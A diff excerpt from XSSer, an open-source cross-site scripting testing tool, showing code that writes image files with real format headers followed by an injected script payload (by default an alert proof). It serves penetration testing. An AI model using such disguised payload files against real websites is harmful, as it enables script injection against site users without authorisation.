Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -34,16 +32,13 @@ class ImageInjections(object):
"""
# check user image name input valid extensions
root, ext = os.path.splitext(filename)
# create file and inject code
# create file and inject code
if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
f = open(filename, 'wb')
# check user payload input
user_payload = payload
if not user_payload:
user_payload = "<script>alert('XSS')</script>"
# inject each XSS specific code
if ext.lower() == ".png":
content = '‰PNG' + user_payload
......@@ -53,16 +48,14 @@ class ImageInjections(object):
content = 'ÿØÿà JFIF' + user_payload
elif ext.lower() == ".bmp":
content = 'BMFÖ' + user_payload
# write and close
f.write(content)